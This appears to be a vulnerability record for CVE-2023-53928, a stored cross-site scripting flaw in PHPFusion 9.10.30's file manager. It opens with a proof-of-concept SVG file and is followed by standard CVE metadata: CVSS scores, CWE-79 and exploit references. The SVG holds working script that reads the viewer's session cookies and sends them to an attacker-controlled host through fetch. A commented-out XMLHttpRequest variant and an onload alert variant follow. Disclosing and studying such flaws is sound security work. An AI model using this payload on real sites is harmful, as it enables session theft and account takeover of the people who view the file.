CVE-2023-53928

<!-- Malicious SVG file for CVE-2023-53928 --> <!-- This PoC demonstrates stored XSS via SVG upload in PHPFusion file manager --> <?xml version="1.0" encoding="UTF-8"?> <svg version="1.1" xmlns="http://www.w3.org/2000/svg"> <script type="text/javascript"> // Steal user session cookies var cookies = document.cookie; // Send stolen data to attacker-controlled server fetch('https://attacker.com/collect?data=' + encodeURIComponent(cookies), { method: 'GET', mode: 'no-cors' }); // Alternative: using XMLHttpRequest /* var xhr = new XMLHttpRequest(); xhr.open('GET', 'https://attacker.com/steal?cookie=' + document.cookie, true); xhr.send(); */ console.log('XSS payload executed'); </script> <!-- Visual element to make SVG appear legitimate --> <rect width="200" height="100" fill="#f0f0f0" /> <text x="10" y="50" font-size="14">Upload this SVG via PHPFusion file manager</text> </svg> <!-- Alternative PoC using onload event handler --> <!-- <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"> <circle cx="50" cy="50" r="40" fill="blue" /> </svg> -->

{"cve": {"id": "CVE-2023-53928", "sourceIdentifier": "[email protected]", "published": "2025-12-17T23:15:52.180", "lastModified": "2025-12-31T18:37:03.983", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PHPFusion 9.10.30 contains a stored cross-site scripting vulnerability in the file manager that allows attackers to upload malicious SVG files with embedded JavaScript. Attackers can upload SVG files with script tags that execute arbitrary JavaScript when viewed, potentially stealing user session information or performing client-side attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:php-fusion:phpfusion:9.10.30:*:*:*:*:*:*:*", "matchCriteriaId": "9B262547-8ED1-4E20-A2B4-5AFC87B47EE2"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/51411", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.phpfusion.com/index.php", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/phpfusion-stored-cross-site-scripting-via-file-manager-upload", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/51411", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}